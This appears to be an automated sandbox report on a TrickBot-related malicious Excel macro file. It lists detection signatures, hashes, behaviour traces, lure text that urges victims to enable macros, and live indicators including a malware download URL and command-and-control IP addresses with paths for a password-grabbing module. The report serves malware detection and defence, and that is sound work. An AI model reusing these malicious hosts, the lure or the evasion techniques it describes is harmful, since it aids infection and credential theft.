Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.857.28723

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.10350.857.28723 (renamed file extension from 28723 to xls)
Analysis ID: 355603
MD5: 983c09da14f7cfb59097c36d2c1f305c
SHA1: deae262a8a7ed515bda8eb857601396dec55d40a
SHA256: 2fcac0949787f1ef4ddee816a8441660b2dfdbf2c843ac392275c65a906b5b5d

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls Virustotal: Detection: 11% Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls ReversingLabs: Detection: 23%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007BCA0 CryptAcquireContextW, 6_2_0007BCA0

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 36.94.62.207:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 36.94.62.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092653960.000000006E849000.00000002.00020000.sdmp, BASE.BABAA.0.dr
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 FindFirstFileW, 6_2_00061290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW, 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW, 6_2_0007FBB0

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 10[1].jjkes.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000784E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, word ptr [eax+02h] 6_2_00069200
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ecx, 00004E20h 6_2_00082659
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx edx, word ptr [eax] 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc dword ptr [esp+40h] 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00072C44
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ecx 6_2_0007B050
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00073860
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000698D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_000624E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h 6_2_00061500
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00065DF0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx eax, byte ptr [ebx] 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_0007B240
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000772A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc edx 6_2_0006BEC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ebx, word ptr [eax] 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 6_2_0006EBE0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.chipmania.it
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.202.191.164:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.81.0.78:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49168 -> 142.202.191.164:443
Source: Traffic Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.22:49174 -> 36.94.62.207:443
Source: Traffic Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.22:49177 -> 103.61.101.11:447
May check the online IP address of the machine
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Source: unknown DNS query: name: wtfismyip.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 103.61.101.11:447
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.61.101.11 103.61.101.11
Source: Joe Sandbox View IP Address: 142.202.191.164 142.202.191.164
Source: Joe Sandbox View IP Address: 95.217.228.176 95.217.228.176
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ELXIREDATA-AS-INELXIREDATASERVICESPVTLTDIN ELXIREDATA-AS-INELXIREDATASERVICESPVTLTDIN
Source: Joe Sandbox View ASN Name: DYNUUS DYNUUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 36.94.62.207:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 36.94.62.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 134.119.186.202
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 142.202.191.164
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 103.61.101.11
Source: unknown TCP traffic detected without corresponding DNS query: 36.94.62.207
Source: unknown TCP traffic detected without corresponding DNS query: 103.61.101.11
Source: unknown TCP traffic detected without corresponding DNS query: 103.61.101.11
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.71.0Host: wtfismyip.com
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: www.chipmania.it
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000002.2353198555.000000000026D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2093057362.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091928851.0000000001FA7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358894477.0000000033B17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353380109.00000000009A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2093057362.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091928851.0000000001FA7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358894477.0000000033B17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353380109.00000000009A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000002.2358312304.0000000033540000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2353183950.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2359153386.00000000340E0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2093057362.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091928851.0000000001FA7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358894477.0000000033B17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353380109.00000000009A7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2093057362.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091928851.0000000001FA7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358894477.0000000033B17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353380109.00000000009A7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000006.00000002.2358312304.0000000033540000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2353183950.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2093057362.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091928851.0000000001FA7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358894477.0000000033B17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353380109.00000000009A7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000006.00000002.2359101614.0000000033E80000.00000004.00000001.sdmp String found in binary or memory: https://103.61.101.11:447/rob60/971342_W617601.BB08CBD1CB3BE0D331A29013BDDA57AE/5/pwgrab64/
Source: wermgr.exe, 00000006.00000002.2353202046.0000000000272000.00000004.00000020.sdmp String found in binary or memory: https://36.94.62.207/rob60/971342_W617601.BB
Source: wermgr.exe, 00000006.00000002.2359101614.0000000033E80000.00000004.00000001.sdmp String found in binary or memory: https://36.94.62.207/rob60/971342_W617601.BB08CBD1CB3BE0D331A29013BDDA57AE/14/NAT%20status/client%20
Source: wermgr.exe, 00000006.00000002.2353152145.000000000020D000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above d 15 16 Once you have enabled editing, please clic
Source: Screenshot number: 4 Screenshot OCR: Enable content button ' ' "==~ " from the yellow bar above 1| 6~_ 24 25 26 27 28 ' D G) 2
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 Screenshot OCR: Enable content button from the yellow bar above j'
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\BASE.BABAA Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007B470 NtDelayExecution, 6_2_0007B470
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,CloseHandle,HeapFree, 6_2_000743C0
Detected potential crypto function
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00068010 6_2_00068010
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00082060 6_2_00082060
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007BCA0 6_2_0007BCA0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00078CA0 6_2_00078CA0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006E0F0 6_2_0006E0F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000789B0 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00069200 6_2_00069200
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 6_2_00061290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000743C0 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00077840 6_2_00077840
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00080870 6_2_00080870
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000644C0 6_2_000644C0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000790E0 6_2_000790E0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000714F0 6_2_000714F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061500 6_2_00061500
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00076100 6_2_00076100
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00076D10 6_2_00076D10
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00072580 6_2_00072580
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007CA00 6_2_0007CA00
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007BE20 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00077630 6_2_00077630
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007CE70 6_2_0007CE70
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006A280 6_2_0006A280
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006C290 6_2_0006C290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006CEB0 6_2_0006CEB0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007B700 6_2_0007B700
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00073B00 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006E310 6_2_0006E310
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00062720 6_2_00062720
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00075F70 6_2_00075F70
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000763A8 6_2_000763A8
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000717B0 6_2_000717B0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000A0040 6_2_000A0040
Document contains embedded VBA macros
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: Joe Sandbox View Dropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Yara signature match
Source: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2092880736.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091736332.0000000001DC0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2358706265.0000000033930000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2353166525.00000000007C0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@12/12@8/7
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 6_2_00064C40
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0006376C CoCreateInstance, 6_2_0006376C
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\10DE0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{464DCB17-71F1-8025-65F1-D113BAFCE15E}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC2E1.tmp Jump to behavior
